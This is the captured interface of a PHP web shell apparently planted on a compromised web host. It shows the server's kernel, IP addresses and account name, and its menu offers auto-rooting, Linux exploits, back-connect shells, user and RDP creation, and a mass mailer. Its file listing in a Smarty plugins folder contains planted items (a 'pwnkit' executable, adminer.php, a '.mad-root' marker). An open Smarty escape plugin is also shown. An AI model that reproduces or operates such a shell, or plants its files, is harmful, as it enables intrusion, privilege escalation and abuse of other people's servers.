Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
tools /
smarty /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
block.textformat.php
3.16
KB
-rw----r--
function.counter.php
1.79
KB
-rw----r--
function.cycle.php
3.17
KB
-rw----r--
function.fetch.php
7.77
KB
-rw----r--
function.html_checkboxes.php
7.83
KB
-rw----r--
function.html_image.php
5.19
KB
-rw----r--
function.html_options.php
7.09
KB
-rw----r--
function.html_radios.php
6.95
KB
-rw----r--
function.html_select_date.php
14.23
KB
-rw----r--
function.html_select_time.php
12.94
KB
-rw----r--
function.html_table.php
5.3
KB
-rw----r--
function.implode.php
921
B
-rw----r--
function.mailto.php
5.33
KB
-rw----r--
function.math.php
2.83
KB
-rw----r--
index.php
1.24
KB
-rw----r--
modifier.capitalize.php
2.92
KB
-rw----r--
modifier.date_format.php
2.21
KB
-rw----r--
modifier.debug_print_var.php
3.39
KB
-rw----r--
modifier.escape.php
7.26
KB
-rw----r--
modifier.regex_replace.php
1.52
KB
-rw----r--
modifier.replace.php
834
B
-rw----r--
modifier.spacify.php
761
B
-rw----r--
modifier.truncate.php
2.09
KB
-rw----r--
modifiercompiler.cat.php
636
B
-rw----r--
modifiercompiler.count_charact...
912
B
-rw----r--
modifiercompiler.count_paragra...
672
B
-rw----r--
modifiercompiler.count_sentenc...
754
B
-rw----r--
modifiercompiler.count_words.p...
974
B
-rw----r--
modifiercompiler.default.php
785
B
-rw----r--
modifiercompiler.escape.php
4.87
KB
-rw----r--
modifiercompiler.from_charset....
761
B
-rw----r--
modifiercompiler.indent.php
711
B
-rw----r--
modifiercompiler.lower.php
734
B
-rw----r--
modifiercompiler.noprint.php
407
B
-rw----r--
modifiercompiler.string_format...
585
B
-rw----r--
modifiercompiler.strip.php
818
B
-rw----r--
modifiercompiler.strip_tags.ph...
723
B
-rw----r--
modifiercompiler.to_charset.ph...
755
B
-rw----r--
modifiercompiler.unescape.php
1.16
KB
-rw----r--
modifiercompiler.upper.php
694
B
-rw----r--
modifiercompiler.wordwrap.php
1.53
KB
-rw----r--
outputfilter.trimwhitespace.ph...
3.39
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
shared.escape_special_chars.ph...
1.63
KB
-rw----r--
shared.literal_compiler_param....
1001
B
-rw----r--
shared.make_timestamp.php
1.27
KB
-rw----r--
shared.mb_str_replace.php
1.71
KB
-rw----r--
shared.mb_unicode.php
1.48
KB
-rw----r--
shared.mb_wordwrap.php
2.76
KB
-rw----r--
variablefilter.htmlspecialchar...
432
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modifiercompiler.escape.php
<?php /** * Smarty plugin * * @package Smarty * @subpackage PluginsModifierCompiler */ /** * @ignore */ require_once( SMARTY_PLUGINS_DIR .'shared.literal_compiler_param.php' ); /** * Smarty escape modifier plugin * * Type: modifier<br> * Name: escape<br> * Purpose: escape string for output * * @link http://www.smarty.net/docsv2/en/language.modifier.escape count_characters (Smarty online manual) * @author Rodney Rehm * @param array $params parameters * @return string with compiled code */ function smarty_modifiercompiler_escape($params, $compiler) { static $_double_encode = null; if ($_double_encode === null) { $_double_encode = version_compare(PHP_VERSION, '5.2.3', '>='); } try { $esc_type = smarty_literal_compiler_param($params, 1, 'html'); $char_set = smarty_literal_compiler_param($params, 2, Smarty::$_CHARSET); $double_encode = smarty_literal_compiler_param($params, 3, true); if (!$char_set) { $char_set = Smarty::$_CHARSET; } switch ($esc_type) { case 'html': if ($_double_encode) { return 'htmlspecialchars(' . $params[0] .', ENT_QUOTES, ' . var_export($char_set, true) . ', ' . var_export($double_encode, true) . ')'; } else if ($double_encode) { return 'htmlspecialchars(' . $params[0] .', ENT_QUOTES, ' . var_export($char_set, true) . ')'; } else { // fall back to modifier.escape.php } case 'htmlall': if (Smarty::$_MBSTRING) { if ($_double_encode) { // php >=5.2.3 - go native return 'mb_convert_encoding(htmlspecialchars(' . $params[0] .', ENT_QUOTES, ' . var_export($char_set, true) . ', ' . var_export($double_encode, true) . '), "HTML-ENTITIES", ' . var_export($char_set, true) . ')'; } else if ($double_encode) { // php <5.2.3 - only handle double encoding return 'mb_convert_encoding(htmlspecialchars(' . $params[0] .', ENT_QUOTES, ' . var_export($char_set, true) . '), "HTML-ENTITIES", ' . var_export($char_set, true) . ')'; } else { // fall back to modifier.escape.php } } // no MBString fallback if ($_double_encode) { // php >=5.2.3 - go native return 'htmlentities(' . $params[0] .', ENT_QUOTES, ' . var_export($char_set, true) . ', ' . var_export($double_encode, true) . ')'; } else if ($double_encode) { // php <5.2.3 - only handle double encoding return 'htmlentities(' . $params[0] .', ENT_QUOTES, ' . var_export($char_set, true) . ')'; } else { // fall back to modifier.escape.php } case 'url': return 'rawurlencode(' . $params[0] . ')'; case 'urlpathinfo': return 'str_replace("%2F", "/", rawurlencode(' . $params[0] . '))'; case 'quotes': // escape unescaped single quotes return 'preg_replace("%(?<!\\\\\\\\)\'%", "\\\'",' . $params[0] . ')'; case 'javascript': // escape quotes and backslashes, newlines, etc. return 'strtr(' . $params[0] . ', array("\\\\" => "\\\\\\\\", "\'" => "\\\\\'", "\"" => "\\\\\"", "\\r" => "\\\\r", "\\n" => "\\\n", "</" => "<\/" ))'; } } catch(SmartyException $e) { // pass through to regular plugin fallback } // could not optimize |escape call, so fallback to regular plugin if ($compiler->template->caching && ($compiler->tag_nocache | $compiler->nocache)) { $compiler->template->required_plugins['nocache']['escape']['modifier']['file'] = SMARTY_PLUGINS_DIR .'modifier.escape.php'; $compiler->template->required_plugins['nocache']['escape']['modifier']['function'] = 'smarty_modifier_escape'; } else { $compiler->template->required_plugins['compiled']['escape']['modifier']['file'] = SMARTY_PLUGINS_DIR .'modifier.escape.php'; $compiler->template->required_plugins['compiled']['escape']['modifier']['function'] = 'smarty_modifier_escape'; } return 'smarty_modifier_escape(' . join( ', ', $params ) . ')'; } ?>
Close